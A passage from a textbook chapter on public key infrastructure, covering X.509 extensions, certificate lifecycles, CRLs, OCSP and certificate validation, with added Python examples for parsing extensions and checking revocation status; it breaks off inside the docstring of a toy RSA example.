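The two rules above (honor the Key Usage bits, and refuse a certificate that carries a critical extension you do not understand) are easy to state and easy to get wrong in a parser. The following is an added example, written for this chapter and not taken from the book, that walks the DER encoding of an X.509 v3 Extensions structure with nothing but the Python standard library. The sample extension bytes are built inline by a tiny DER encoder, so they are constructed for the example rather than lifted from a real certificate; the private extension OID 1.3.6.1.4.1.99999.1 is a made-up placeholder. The same Key Usage extension is paired once with a noncritical unknown extension (tolerated) and once with a critical unknown extension (certificate rejected).

```python
"""Parse the X.509 v3 Extensions structure and apply the key-usage and
critical-flag rules of RFC 5280 (Sections 4.2 and 4.2.1.3).

Added example; not code from the book. Standard library only. The
extension bytes below are constructed here for illustration and do not
come from any real certificate; the OID 1.3.6.1.4.1.99999.1 is made up.
"""
from typing import Iterator, List, Tuple

TAG_BOOLEAN, TAG_BIT_STRING, TAG_OCTET_STRING, TAG_OID, TAG_SEQUENCE = 0x01, 0x03, 0x04, 0x06, 0x30

# RFC 5280 4.2.1.3: bit positions in the KeyUsage BIT STRING, most significant bit first.
KEY_USAGE_BITS = ["digitalSignature", "nonRepudiation", "keyEncipherment",
                  "dataEncipherment", "keyAgreement", "keyCertSign", "cRLSign",
                  "encipherOnly", "decipherOnly"]
OID_KEY_USAGE = "2.5.29.15"
OID_KEY_USAGE_DER = b"\x55\x1d\x0f"
OID_PRIVATE_DER = b"\x2b\x06\x01\x04\x01\x86\x8d\x1f\x01"   # 1.3.6.1.4.1.99999.1 (made up)


# ---- tiny DER encoder, used only to build the constructed sample input ----
def der(tag: int, payload: bytes) -> bytes:
    """One TLV with a short-form definite length (all we need for the sample)."""
    assert len(payload) < 128
    return bytes([tag, len(payload)]) + payload


def key_usage_extension(usages: List[str], critical: bool) -> bytes:
    hi = max(KEY_USAGE_BITS.index(u) for u in usages)
    nbytes, bits = hi // 8 + 1, bytearray(hi // 8 + 1)
    for u in usages:
        i = KEY_USAGE_BITS.index(u)
        bits[i // 8] |= 0x80 >> (i % 8)
    unused = nbytes * 8 - (hi + 1)           # BIT STRING's leading "unused bits" byte
    value = der(TAG_BIT_STRING, bytes([unused]) + bytes(bits))
    flag = der(TAG_BOOLEAN, b"\xff") if critical else b""   # DEFAULT FALSE is omitted in DER
    return der(TAG_SEQUENCE, der(TAG_OID, OID_KEY_USAGE_DER) + flag + der(TAG_OCTET_STRING, value))


def private_extension(critical: bool) -> bytes:
    flag = der(TAG_BOOLEAN, b"\xff") if critical else b""
    return der(TAG_SEQUENCE, der(TAG_OID, OID_PRIVATE_DER) + flag + der(TAG_OCTET_STRING, b"\x01\x02\x03"))


# Constructed samples: the same Key Usage extension beside a private extension the
# validator has never heard of, once noncritical and once critical.
KEY_USAGE = key_usage_extension(["digitalSignature", "keyEncipherment"], critical=True)
SAMPLE_NONCRITICAL = der(TAG_SEQUENCE, KEY_USAGE + private_extension(critical=False))
SAMPLE_CRITICAL = der(TAG_SEQUENCE, KEY_USAGE + private_extension(critical=True))


# ---- decoder -------------------------------------------------------------
def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, position after the element); handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def iter_children(seq: bytes) -> Iterator[Tuple[int, bytes]]:
    pos = 0
    while pos < len(seq):
        tag, value, pos = read_tlv(seq, pos)
        yield tag, value


def decode_oid(value: bytes) -> str:
    arcs, acc = [value[0] // 40, value[0] % 40], 0
    for b in value[1:]:                      # base-128, high bit set on all but the last byte
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))


def decode_key_usage(bitstring: bytes) -> List[str]:
    unused, bits = bitstring[0], bitstring[1:]
    nbits = min(len(bits) * 8 - unused, len(KEY_USAGE_BITS))
    return [KEY_USAGE_BITS[i] for i in range(nbits) if bits[i // 8] & (0x80 >> (i % 8))]


def parse_extensions(extensions_der: bytes) -> List[dict]:
    tag, seq, _ = read_tlv(extensions_der, 0)
    assert tag == TAG_SEQUENCE
    parsed = []
    for _, ext in iter_children(seq):
        parts = list(iter_children(ext))     # [OID, optional BOOLEAN critical, OCTET STRING]
        oid, critical = decode_oid(parts[0][1]), False
        if parts[1][0] == TAG_BOOLEAN:
            critical = parts[1][1] != b"\x00"
        entry = {"oid": oid, "critical": critical, "value": parts[-1][1]}
        if oid == OID_KEY_USAGE:
            inner_tag, inner, _ = read_tlv(entry["value"], 0)
            assert inner_tag == TAG_BIT_STRING
            entry["keyUsage"] = decode_key_usage(inner)
        parsed.append(entry)
    return parsed


def check_extensions(extensions_der: bytes, needed_usage: str) -> Tuple[bool, str]:
    """Reject an unknown critical extension; reject a use the Key Usage bits do not allow."""
    for ext in parse_extensions(extensions_der):
        if ext["oid"] == OID_KEY_USAGE:
            if needed_usage not in ext["keyUsage"]:
                return False, f"key usage does not permit {needed_usage}: {ext['keyUsage']}"
        elif ext["critical"]:
            return False, f"unknown critical extension {ext['oid']}; certificate unusable"
    return True, "ok"


if __name__ == "__main__":
    print(parse_extensions(SAMPLE_NONCRITICAL))
    print(check_extensions(SAMPLE_NONCRITICAL, "digitalSignature"))
    print(check_extensions(SAMPLE_NONCRITICAL, "keyCertSign"))
    print(check_extensions(SAMPLE_CRITICAL, "digitalSignature"))
```

Two details are worth noticing in the decoder: the critical BOOLEAN is absent, not FALSE, when the extension is noncritical (DER omits DEFAULT values), and the first byte of the Key Usage BIT STRING counts unused trailing bits, which is why a certificate permitting only digitalSignature and keyEncipherment encodes as the single byte 0xA0 with 5 unused bits.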
Certificate Attributes
Four main types of certificates are used:

End-entity certificates
CA certificates
Cross-certification certificates
Policy certificates
End-entity certificates are issued by a CA to a specific subject, such as Joyce, the Accounting department, or a firewall, as illustrated in Figure 6.6. An end-entity certificate is the identity document provided by PKI implementations.
• Figure 6.6 End-entity and CA certificates
A CA certificate can be self-signed, in the case of a standalone or root CA, or it can be issued by a superior CA within a hierarchical model. In the model in Figure 6.6, the superior CA gives the authority and allows the subordinate CA to accept certificate requests and generate the individual certificates itself. This may be necessary when a company needs to have multiple internal CAs, and different departments within an organization need to have their own CAs servicing their specific end-entities in their sections. In these situations, a representative from each department requiring a CA registers with the higher trusted CA and requests a Certificate Authority certificate. (Public and private CAs are discussed in the "Public Certificate Authorities" and "In-House Certificate Authorities" sections later in this chapter, as are the different trust models that are available for companies.)

A cross-certification certificate, or cross-certificate, is used when independent CAs establish peer-to-peer trust relationships. Simply put, cross-certificates are a mechanism through which one CA can issue a certificate allowing its users to trust another CA.

Within sophisticated CAs used for high-security applications, a mechanism is required to provide centrally controlled policy information to PKI clients. This is often done by placing the policy information in a policy certificate.
Certificate Lifecycles
Keys and certificates should have lifetime settings that force the user to register for a new certificate after a certain amount of time. Determining the proper length of these lifetimes is a trade-off: shorter lifetimes limit the ability of attackers to crack them, but longer lifetimes lower system overhead. More-sophisticated PKI implementations perform automated and often transparent key updates to avoid the time and expense of having users register for new certificates when old ones expire.

This means that the certificate and key pair has a lifecycle that must be managed. Certificate management involves administrating and managing each of these phases, including registration, certificate and key generation, renewal, and revocation. Additional management functions include CRL distribution, certificate suspension, and key destruction.

Setting certificate lifetimes way into the future and using them for long periods of time provides attackers with extended windows to attack the cryptography. As stated in Chapter 5, cryptography merely buys time against an attacker; it is never an absolute guarantee.
Registration and Generation
A key pair (public and private keys) can be generated locally by an application and stored in a local key store on the user's workstation. The key pair can also be created by a central key-generation server, which will require secure transmission of the keys to the user. The key pair that is created on the centralized server can be stored on the user's workstation or on the user's smart card, which will allow for more flexibility and mobility.

The act of verifying that an individual indeed has the corresponding private key for a given public key is referred to as proof of possession. Not all public/private key pairs can be used for digital signatures, so asking the individual to sign a message and return it to prove that she has the necessary private key will not always work. If a key pair is used only for encryption, the RA can instead encrypt a challenge value with the public key that was provided earlier and send it to the individual, who uses her private key to decrypt it and returns the recovered value to the RA. If the returned value matches the challenge, the RA can be confident that the individual has the necessary private key and can continue through the rest of the registration phase.
Key regeneration and replacement is usually done to protect against brute-force and cryptanalytic attacks on a key that has been in use for a long time, although as the processing power of computers increases and our knowledge of cryptography and new possible cryptanalysis-based attacks expands, key lifetimes may drastically decrease. As with everything within the security field, it is better to be safe now than to be surprised later and sorry.

Exam Tip: Good key management and proper key replacement intervals protect keys from being compromised through human error. Choosing a large key size makes a brute-force attack more difficult.

The PKI administrator usually configures the minimum required key size that users must use to have a key generated for the first time, and then for each renewal. In most applications, there is a drop-down list of possible algorithms to choose from, and possible key sizes. The key size should provide the necessary level of security for the current environment. The lifetime of the key should be long enough that continual renewal will not negatively affect productivity, but short enough to ensure that the key cannot be successfully compromised.
Tech Tip
Centralized vs. Local Key Generation
In most modern PKI implementations, users have two key pairs. One key pair is often generated by a central server and used for encryption and key transfers. This allows the corporate PKI to retain a copy of the encryption key pair for recovery, if necessary. The second key pair, a digital signature key pair, is usually generated by the user to make sure that she is the only one with a copy of the private key. Nonrepudiation can be challenged if there is any doubt about someone else obtaining a copy of an individual's signature private key. If the key pair was created on a centralized server, that could weaken the case that the individual was the only one who had a copy of her private key. If a copy of a user's signature private key is stored anywhere other than in her possession, or if there is a possibility of someone obtaining the user's key, then true nonrepudiation cannot be provided.
CSR
A certificate signing request (CSR) is the actual request to a CA containing a public key and the requisite information needed to generate a certificate. The CSR contains all of the identifying information that is to be bound to the key by the certificate generation process. In the common PKCS #10 format (RFC 2986), the request is itself signed with the private key that matches the enclosed public key, which gives the CA proof of possession for signature-capable keys.
Renewal
The certificate itself has its own lifetime, which can be different from the key pair's lifetime. The certificate's lifetime is specified by the validity dates inserted into the digital certificate. These are beginning and ending dates indicating the time period during which the certificate is valid. The certificate cannot be used before the start date, and once the end date is met, the certificate is expired and a new certificate will need to be issued.

A renewal process is different from the registration phase in that the RA assumes that the individual has already successfully completed one registration round. If the certificate has not actually been revoked, the original keys and certificate can be used to provide the necessary authentication information and proof of identity for the renewal phase.

The certificate may or may not need to change during the renewal process; this usually depends on why the renewal is taking place. If the certificate just expired and the keys will still be used for the same purpose, a new certificate can be generated with new validity dates. If, however, the key pair functionality needs to be expanded or restricted, new attributes and extensions may need to be integrated into the new certificate. These new functionalities may require more information to be gathered from the individual renewing the certificate, especially if the class changes or the new key uses allow for more powerful abilities. This renewal process is required when the certificate has fulfilled its lifetime and its end validity date has been met.
Suspension
When the owner of a certificate wishes to mark a certificate as no longer valid prior to its natural expiration, two choices exist: revocation and suspension. Revocation, discussed in the next section, is an action with a permanent outcome. Instead of being revoked, a certificate can be suspended, meaning it is temporarily put on hold. If, for example, Bob is taking an extended vacation and wants to ensure that his certificate will not be compromised or used during that time, he can make a suspension request to the CA. The CRL would list this certificate and its serial number, and in the field that describes why the certificate is revoked, it would instead indicate a hold state (the certificateHold reason code). Once Bob returns to work, he can make a request to the CA to remove his certificate from the list.

Exam Tip: A certificate suspension can be a useful process tool while investigating whether or not a certificate should be considered to be valid.

Another reason to suspend a certificate is if an administrator is suspicious that a private key might have been compromised. While the issue is under investigation, the certificate can be suspended to ensure that it cannot be used.

Relying on an expiration date on a certificate to "destroy" the utility of a key will not work. A new certificate can be issued with an "extended date." To end the use of a key set, an entry in a CRL is the only sure way to prevent reissuance and re-dating of a certificate.
Revocation
A certificate can be revoked when its validity needs to be ended before its actual expiration date is met, and this can occur for many reasons: for example, a user may have lost a laptop or a smart card that stored a private key; an improper software implementation may have been uncovered that directly affected the security of a private key; a user may have fallen victim to a social engineering attack and inadvertently given up a private key; data held within the certificate may no longer apply to the specified individual; or perhaps an employee left a company and should not be identified as a member of an in-house PKI any longer. In the last instance, the certificate, which was bound to the user's key pair, identified the user as an employee of the company, and the administrator would want to ensure that the key pair could not be used in the future to validate this person's affiliation with the company. Revoking the certificate does this.

Once revoked, a certificate cannot be reinstated. This is to prevent an unauthorized reinstatement by someone who has unauthorized access to the key(s). A key pair can be reinstated for use by issuing a new certificate if at a later time the keys are found to be secure. The old certificate would still be void, but the new one would be valid.

If any of these things happens, a user's private key has been compromised or should no longer be mapped to the owner's identity. A different individual may have access to that user's private key and could use it to impersonate and authenticate as the original user. If the impersonator used the key to digitally sign a message, the receiver would verify the authenticity of the sender by verifying the signature by using the original user's public key, and the verification would go through perfectly; the receiver would believe it came from the proper sender and not the impersonator. If receivers could look at a list of certificates that had been revoked before verifying the digital signature, however, they would know not to trust the digital signatures on the list. This is also why revocation is permanent and final: if reinstatement were allowed and a user revoked his certificate, the unauthorized holder of the private key could use that key to restore the certificate's validity.

Exam Tip: A certificate cannot be assumed to be valid without checking for revocation before each use.
Certificate Revocation List
The CA provides protection against impersonation and similar fraud by maintaining a certificate revocation list (CRL), a list of serial numbers of certificates that have been revoked. The CRL also contains a statement indicating why the individual certificates were revoked and a date when the revocation took place. The list usually contains all certificates that have been revoked within the lifetime of the CA (a CA may drop an entry once the revoked certificate has also expired, since it is then invalid on either count). Certificates that have expired are not the same as those that have been revoked. If a certificate has expired, it means that its end validity date was reached. The format of the CRL message is also defined by X.509. The list is signed, to prevent tampering, and contains information on certificates that have been revoked and the reasons for their revocation. These lists can grow quite long, and as such, there are provisions for date time stamping the list and for issuing delta lists, which show changes since the last list was issued.
Tech Tip
CRL Reason Codes
Per the X.509 v2 CRL standard (the CRLReason values of RFC 5280, Section 5.3.1), the following reasons for revocation are used:

unspecified (0)
keyCompromise (1)
cACompromise (2)
affiliationChanged (3)
superseded (4)
cessationOfOperation (5)
certificateHold (6)
removeFromCRL (8)
privilegeWithdrawn (9)
aACompromise (10)
The CA is the entity that is responsible for the status of the certificates it generates; it needs to be told of a revocation, and it must provide this information to others. The CA is responsible for maintaining the CRL and posting it in a publicly available directory.

Exam Tip: The certificate revocation list is an essential item to ensure a certificate is still valid. CAs post CRLs in publicly available directories to permit automated checking of certificates against the list before certificate use by a client. A user should never trust a certificate that has not been checked against the appropriate CRL.
We need to have some system in place to make sure people cannot arbitrarily have others' certificates revoked, whether for revenge or for malicious purposes. When a revocation request is submitted, the individual submitting the request must be authenticated. Otherwise, this could permit a type of denial-of-service attack, in which someone has another person's certificate revoked. The authentication can involve an agreed-upon password that was created during the registration process, but authentication should not be based on the individual proving that he has the corresponding private key, because it may have been stolen, and the CA would be authenticating an imposter.

The CRL's integrity needs to be protected to ensure that attackers cannot modify data pertaining to a revoked certificate on the list. If this were allowed to take place, anyone who stole a private key could just delete the entry for the matching certificate from the CRL and continue to use the private key fraudulently. The integrity of the list also needs to be protected to ensure that bogus data is not added to it. Otherwise, anyone could add another person's certificate to the list and effectively revoke that person's certificate. The only entity that should be able to modify any information on the CRL is the CA.

The mechanism used to protect the integrity of a CRL is a digital signature. The CA's revocation service creates a digital signature for the CRL, as shown in Figure 6.7. To validate a certificate, the user accesses the directory where the CRL is posted, downloads the list, and verifies the CA's digital signature to ensure that the proper authority signed the list and to ensure that the list was not modified in an unauthorized manner. The user then looks through the list to determine whether the serial number of the certificate that he is trying to validate is listed. If the serial number is on the list, the private key should no longer be trusted, and the public key should no longer be used. This can be a cumbersome process, so it has been automated in several ways, which are described in the next section.
• Figure 6.7 The CA digitally signs the CRL to protect its integrity.
One concern is how up-to-date the CRL is: how often is it updated, and does it actually reflect all the certificates currently revoked? The actual frequency with which the list is updated depends upon the CA and its certification practices statement (CPS). It is important that the list is updated in a timely manner so that anyone using the list has the most current information. A signed CRL carries thisUpdate and nextUpdate fields for exactly this purpose; a client should treat a list whose nextUpdate time has passed as stale rather than keep relying on it.
CRL Distribution
CRL files can be requested by individuals who need to verify and validate a newly received certificate, or the files can be periodically pushed down (sent) to all users participating within a specific PKI. This means the CRL can be pulled (downloaded) by individual users when needed or pushed down to all users within the PKI on a timed interval.

The actual CRL file can grow substantially, and transmitting this file and requiring PKI client software on each workstation to save and maintain it can use a lot of resources, so the smaller the CRL is, the better. It is also possible to first push down the full CRL and subsequently push down only delta CRLs, which contain only the changes to the original or base CRL. This can greatly reduce the amount of bandwidth consumed when updating CRLs.
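Suspension, permanent revocation, delta CRLs and the freshness of the list all come together when a client actually decides whether a serial number is usable. The block below is an added example for this chapter, not the book's code; it models a base CRL and a delta CRL as plain Python dictionaries with constructed serial numbers, dates and reasons, and applies the status logic described in the Suspension, Revocation and CRL sections: certificateHold is a suspension, removeFromCRL in a delta lifts a hold and nothing else, any other reason is permanent, and a list past its nextUpdate is not trusted. The CA's signature over each list and the X.509 CRL encoding are out of scope here and assumed to have been verified already.

```python
"""Revocation status from a base CRL plus a delta CRL, with the
certificateHold / removeFromCRL pair that implements suspension.

Added example; not code from the book. Standard library only. The two CRLs
are dictionaries whose serials, dates and reasons are constructed for the
example. A real client first verifies the CA's signature over each list and
parses the X.509 CRL encoding; both are assumed done here. Reason codes are
those of RFC 5280 Section 5.3.1; delta handling follows Section 5.2.4.
"""
from datetime import datetime, timezone
from typing import Dict, Optional

CRL_REASONS = {0: "unspecified", 1: "keyCompromise", 2: "cACompromise",
               3: "affiliationChanged", 4: "superseded", 5: "cessationOfOperation",
               6: "certificateHold", 8: "removeFromCRL", 9: "privilegeWithdrawn",
               10: "aACompromise"}
CERTIFICATE_HOLD, REMOVE_FROM_CRL = 6, 8


def utc(y: int, m: int, d: int, h: int = 0) -> datetime:
    return datetime(y, m, d, h, tzinfo=timezone.utc)


# Constructed sample: base CRL number 41, and the delta CRL issued against it.
BASE_CRL = {
    "number": 41, "this_update": utc(2016, 3, 1), "next_update": utc(2016, 3, 8),
    "entries": {
        0x1001: {"reason": 1, "date": utc(2016, 2, 20)},   # keyCompromise: permanent
        0x1002: {"reason": 6, "date": utc(2016, 2, 28)},   # Bob's certificate, on hold for his vacation
        0x1003: {"reason": 6, "date": utc(2016, 2, 28)},   # on hold pending an investigation
    },
}
DELTA_CRL = {
    "number": 43, "base_number": 41,
    "this_update": utc(2016, 3, 3), "next_update": utc(2016, 3, 4),
    "entries": {
        0x1002: {"reason": 8, "date": utc(2016, 3, 2)},    # removeFromCRL: Bob is back, hold lifted
        0x1003: {"reason": 1, "date": utc(2016, 3, 3)},    # investigation confirmed a compromise
        0x1004: {"reason": 3, "date": utc(2016, 3, 3)},    # newly revoked since the base was issued
    },
}


def is_stale(crl: Dict, now: datetime) -> bool:
    """A list past its nextUpdate may be missing revocations; do not rely on it."""
    return now >= crl["next_update"]


def merge_delta(base: Dict, delta: Dict) -> Dict[int, dict]:
    """Apply a delta CRL to the complete CRL it was issued against."""
    if delta["base_number"] > base["number"]:
        raise ValueError("delta CRL needs a newer base CRL than the one on hand")
    merged = dict(base["entries"])
    for serial, entry in delta["entries"].items():
        if entry["reason"] == REMOVE_FROM_CRL:
            held = merged.get(serial)
            if held is None or held["reason"] != CERTIFICATE_HOLD:
                raise ValueError(f"removeFromCRL for {serial:#x} but it was not on hold")
            merged.pop(serial)        # only a hold can be lifted; revocation is permanent
        else:
            merged[serial] = entry    # new revocation, or a hold escalated to a permanent reason
    return merged


def certificate_status(serial: int, base: Dict, delta: Optional[Dict], now: datetime) -> str:
    if is_stale(base, now) or (delta is not None and is_stale(delta, now)):
        return "unknown: revocation data is stale, refuse to rely on it"
    entries = merge_delta(base, delta) if delta is not None else base["entries"]
    entry = entries.get(serial)
    if entry is None:
        return "good"
    if entry["reason"] == CERTIFICATE_HOLD:
        return f"suspended (certificateHold since {entry['date'].date()})"
    return f"revoked ({CRL_REASONS.get(entry['reason'], 'unspecified')} since {entry['date'].date()})"


if __name__ == "__main__":
    now = utc(2016, 3, 3, 12)
    for serial in (0x1001, 0x1002, 0x1003, 0x1004, 0x1005):
        print(f"{serial:#x}: base only -> {certificate_status(serial, BASE_CRL, None, now)}; "
              f"with delta -> {certificate_status(serial, BASE_CRL, DELTA_CRL, now)}")
```

Run with the base list alone, Bob's certificate (0x1002) reports as suspended; with the delta applied it is good again, while 0x1003, also on hold in the base, has been escalated to keyCompromise and stays revoked. Note that a stale list yields "unknown", not "good": a client that quietly treats a missing or expired CRL as a clean bill of health hands an attacker who can block the download a way around revocation.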
Tech Tip
Authority Revocation Lists
In some PKI implementations, a separate revocation list is maintained for CA keys that have been compromised or should no longer be trusted. This list is known as an authority revocation list (ARL). In the event that a CA's private key is compromised or a cross-certification is cancelled, the relevant certificate's serial number is included in the ARL. A client can review an ARL to make sure the CA's public key can still be trusted.
In implementations where the CRLs are not pushed down to individual systems, the users' PKI software needs to know where to look for the posted CRL that relates to the certificate it is trying to validate. The certificate might have an extension (the CRL Distribution Points extension defined in RFC 5280) that points the validating user to the necessary CRL distribution point. The network administrator sets up the distribution points, and one or more points can exist for a particular PKI. The distribution point holds one or more lists containing the serial numbers of revoked certificates, and the user's PKI software scans the list(s) for the serial number of the certificate the user is attempting to validate. If the serial number is not present, the user is assured that it has not been revoked. This approach helps point users to the right resource and also reduces the amount of information that needs to be scanned when checking that a certificate has not been revoked.
Online Certificate Status Protocol (OCSP)
One last option for checking distributed CRLs is an online service. When a client user needs to validate a certificate and ensure that it has not been revoked, he can communicate with an online service that will query the necessary CRLs available within the environment. This service can query the lists for the client instead of pushing down the full CRL to each and every system. So if Joe receives a certificate from Stacy, he can contact an online service and send to it the serial number listed in the certificate Stacy sent. The online service would query the necessary CRLs and respond to Joe, indicating whether or not that serial number was listed as being revoked.

One of the protocols used for online revocation services is the Online Certificate Status Protocol (OCSP), a request and response protocol that obtains the serial number of the certificate that is being validated and reviews revocation lists for the client. The protocol has a responder service that reports the status of the certificate back to the client, indicating whether it has been revoked, is valid, or has an unknown status. This protocol and service saves the client from having to find, download, and process the right lists. An OCSP response is itself digitally signed by the responder, so the client must verify that signature, and the responder's authority to answer for the issuing CA, before acting on the answer; a client that accepts "good" from an unverified responder, or treats an unreachable responder as "good", gives an attacker who can spoof or block the response a way around revocation.

Exam Tip: Certificate revocation checks are done either by examining the CRL or by using OCSP to see if a certificate has been revoked.
Key Destruction
Key pairs and certificates have set lifetimes, meaning that they will expire at some specified time. It is important that the certificates and keys are properly destroyed when that time comes, wherever the keys are stored (on users' workstations, centralized key servers, USB token devices, smart cards, and so on).
Tech Tip
Historical Retention of Certificates
Note that in modern PKIs, encryption key pairs usually must be retained long after they expire so that users can decrypt information that was encrypted with the old keys. For example, if Bob encrypts a document using his current key and the keys are updated three months later, Bob's software must maintain a copy of the old key so he can still decrypt the document. In the PKI world, this issue is referred to as key history maintenance.
The goal is to make sure that no one can gain access to a key after its lifetime has ended and use that key for malicious purposes. An attacker might use the key to digitally sign or encrypt a message with the hopes of tricking someone else about his identity (an impersonation attack). Also, if the attacker is performing some type of brute-force attack on your cryptosystem, trying to figure out specific keys that were used for encryption processes, obtaining an old key could give him more insight into how your cryptosystem generates keys. The less information you supply to potential hackers, the better.
Certificate Repositories
Once the requestor's identity has been proven, a certificate is registered with the public side of the key pair provided by the requestor. Public keys must be available to anybody who requires them to communicate within a PKI environment. These keys, and their corresponding certificates, are usually held in a publicly available repository. Certificate repository is a general term that describes a centralized directory that can be accessed by a subset of individuals. The directories are usually Lightweight Directory Access Protocol (LDAP)-compliant, meaning that they can be accessed and searched via an LDAP query from an LDAP client.

When an individual initializes communication with another, the sender can send her certificate and public key to the receiver, which will allow the receiver to communicate with the sender using encryption or digital signatures (or both) without needing to track down the necessary public key in a certificate repository. This is equivalent to the sender saying, "If you would like to encrypt any future messages you send to me, or if you would like the ability to verify my digital signature, here are the necessary components." But if a person wants to encrypt the first message sent to the receiver, the sender needs to find the receiver's public key in a certificate repository.
Cross Check
Certificates and Keys
Certificates are a standardized method of exchanging asymmetric key information. To understand the need for certificates, you should first be able to answer the questions:

What do I need a public key for?
How can I get someone's public key, and how do I know it is theirs?

For a refresher on how public and private keys come into play with encryption and digital signatures, refer to Chapter 5.
A certificate repository is a holding place for individuals' certificates and public keys that are participating in a particular PKI environment. The security requirements for repositories themselves are not as high as those needed for actual CAs and for the equipment and software used to carry out CA functions. Since each certificate is digitally signed by the CA, if a certificate stored in the certificate repository is modified, the recipient will be able to detect this change and know not to accept the certificate as valid.
Trust and Certificate Verification
We need to use a PKI if we do not automatically trust individuals we do not know. Security is about being suspicious and being safe, so we need a third party that we do trust to vouch for the other individual before confidence can be instilled and sensitive communication can take place. But what does it mean that we trust a CA, and how can we use this to our advantage?

When a user chooses to trust a CA, she will download that CA's digital certificate and public key, which will be stored on her local computer. Most browsers have a list of CAs configured to be trusted by default, so when a user installs a new web browser, several of the most well-known and most trusted CAs will be trusted without any change of settings. An example of this listing is shown in Figure 6.8.
• Figure 6.8 Browsers have a long list of CAs configured to be trusted by default.
In the Microsoft CAPI environment, the user can add and remove CAs from this list as needed. In production environments that require a higher degree of protection, this list will be pruned, and possibly the only CAs listed will be the company's internal CAs. This ensures that digitally signed software will be automatically installed only if it was signed by the company's CA. Other products, such as Entrust, use centrally controlled policies to determine which CAs are to be trusted, instead of expecting the user to make these critical decisions.
Tech Tip
Distinguished Names
A distinguished name is a label that follows the X.500 standard. This standard defines a naming convention that can be employed so that each subject within an organization has a unique name. An example is {Country = US, Organization = Real Secure, Organizational Unit = R&D, Location = Washington}. CAs use distinguished names to identify the owners of specific certificates.
A number of steps are involved in checking the validity of a message. Suppose, for example, that Maynard receives a digitally signed message from Joyce, who he does not know or trust. Joyce has also included her digital certificate with her message, which has her public key embedded within it. Before Maynard can be sure of the authenticity of this message, he has some work to do. The steps are illustrated in Figure 6.9.
• Figure 6.9 Steps for verifying the authenticity and integrity of a certificate
First, Maynard sees which CA signed Joyce's certificate and compares it to the list of CAs he has configured within his computer. He trusts the CAs in his list and no others. (If the certificate was signed by a CA that he does not have in the list, he would not accept the certificate as being valid, and thus he could not be sure that this message was actually sent from Joyce or that the attached key was actually her public key.)
Because certificates produce chains of trust, having an unnecessary certificate in your certificate store could lead to trust problems. Best practices indicate that you should understand the certificates in your store, and the need for each. When in doubt, remove it. If it is needed, you can add it back later.
Maynard sees that the CA that signed Joyce's certificate is indeed in his list of trusted CAs, so he now needs to verify that the certificate has not been altered. Using the CA's public key and the digest of the certificate, Maynard can verify the integrity of the certificate. Then Maynard can be assured that this CA did actually create the certificate, so he can now trust the origin of Joyce's certificate. The use of digital signatures allows certificates to be saved in public directories without the concern of them being accidentally or intentionally altered. If a user extracts a certificate from a repository and creates a message digest value that does not match the digital signature embedded within the certificate itself, that user will know that the certificate has been modified by someone other than the CA, and he will know not to accept the validity of the corresponding public key. Similarly, an attacker could not create a new message digest, encrypt it, and embed it within the certificate because he would not have access to the CA's private key.
But Maynard is not done yet. He needs to be sure that the certificate is currently valid and that the issuing CA has not revoked it. The certificate has start and stop dates, indicating a time during which the certificate is valid. If the start date hasn't happened yet or the stop date has been passed, the certificate is not valid. Maynard reviews these dates to make sure the certificate is still deemed valid.

The next step Maynard goes through is to check whether this certificate has been revoked for any reason. To do so, he will refer to the certificate revocation list (CRL) to see if Joyce's certificate is listed. He could check the CRL directly with the CA that issued the certificate or via a specialized online service that supports the Online Certificate Status Protocol (OCSP). (Certificate revocation and list distribution were explained in the "Certificate Lifecycles" section, earlier in this chapter.)
Tech Tip
Validating a Certificate
The following steps are required for validating a certificate:

1. Compare the CA that digitally signed the certificate to a list of CAs that have already been loaded into the receiver's computer.
2. Calculate a message digest for the certificate.
3. Use the CA's public key to decrypt the digital signature and recover what is claimed to be the original message digest embedded within the certificate (validating the digital signature).
4. Compare the two resulting message digest values to ensure the integrity of the certificate.
5. Review the identification information within the certificate, such as the e-mail address.
6. Review the validity dates.
7. Check a revocation list to see if the certificate has been revoked.
Maynard now trusts that this certificate is legitimate and that it belongs to Joyce. Now what does he need to do? The certificate holds Joyce's public key, which he needs to validate the digital signature she appended to her message, so Maynard extracts Joyce's public key from her certificate, runs her message through a hashing algorithm, and calculates a message digest value of X. He then uses Joyce's public key to decrypt her digital signature (remember that a digital signature is just a message digest encrypted with a private key). This decryption process provides him with another message digest of value Y. Maynard compares values X and Y, and if they are the same, he is assured that the message has not been modified during transmission. Thus he has confidence in the integrity of the message. But how does Maynard know that the message actually came from Joyce? Because he can decrypt the digital signature using her public key, which indicates that only the associated private key could have been used. There is a minuscule risk that someone could create an identical key pair, but given the enormous key space for public keys, this is impractical. The public key can only decrypt something that was encrypted with the related private key, and only the owner of the private key is supposed to have access to it. Maynard can be sure that this message came from Joyce. After all of this he reads her message, which says, "Hi. How are you?"

(The "decrypt the signature" picture is the textbook RSA view and is fine for understanding the flow. Production signature schemes add padding (RSA PKCS #1 v1.5, RSA-PSS) or use a different construction altogether (ECDSA, EdDSA), so real code calls a library's verify operation rather than performing a raw decryption.)

All of that work just for this message? Maynard's blood pressure would surely go through the roof if he had to do all of this work only to end up with a short and not very useful message. Fortunately, all of this PKI work is performed without user intervention and happens behind the scenes. Maynard didn't have to exert any energy. He simply replies, "Fine. How are you?"
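The Maynard and Joyce walk-through, and the seven-step Tech Tip before it, can be run end to end. The block below is an added example written for this chapter, not code from the book. It uses only the Python standard library, and its signature scheme is a deliberately toy "textbook RSA" (raw modular exponentiation of a SHA-256 digest, no padding, moduli built from published Mersenne primes) so that the "decrypt the signature and compare digests" description can be executed literally; it is not a secure scheme and must not be copied into real code, which should use a library's verify operation. The CA, Joyce, the impostor, the serial numbers, the dates and the CRL contents are all constructed. Each scenario exercises one of the checks: a genuine message, a tampered message, a revoked certificate, an expired certificate, a certificate from a CA that is not in the trust store, and Joyce's real certificate with the attacker's key swapped in.

```python
"""Run the verification sequence from the text: trust-store lookup for the
issuer, certificate signature check, validity dates, revocation, identity,
and finally the signature on the message itself.

Added example; not code from the book. Standard library only. The signature
scheme is TOY textbook RSA over SHA-256 with no padding and Mersenne-prime
moduli; it exists to make the text's "decrypt the signature" picture runnable
and is not secure. Real code uses a library (RSA-PSS, ECDSA, Ed25519).
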